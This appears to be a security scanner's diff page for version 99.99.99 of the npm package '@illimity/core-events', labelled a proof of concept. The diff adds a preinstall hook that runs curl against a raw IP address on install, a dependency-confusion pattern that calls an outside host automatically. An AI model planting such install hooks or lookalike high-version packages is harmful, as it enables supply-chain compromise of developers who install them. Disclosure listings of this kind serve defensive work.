@illimity/core-events 99.99.9-9.1 → 99.99.99
Sign up to get free protection for your applications and to get access to all the features.
- package/package.json +2 -2
package/package.json
CHANGED
@@ -1,11 +1,11 @@
|
|
1
1
|
{
|
2
2
|
"name": "@illimity/core-events",
|
3
|
-
"version": "99.99.99
|
3
|
+
"version": "99.99.99",
|
4
4
|
"description": "CryptoNet Labs PoC",
|
5
5
|
"main": "index.js",
|
6
6
|
"scripts": {
|
7
7
|
"test": "echo \\\\\\\"Error: no test specified\\\\\\\" && exit 1",
|
8
|
-
"preinstall": "curl
|
8
|
+
"preinstall": "curl http://129.152.20.51/core-events"
|
9
9
|
},
|
10
10
|
"author": "CryptoNetLabs s.r.l.",
|
11
11
|
"license": "ISC"
|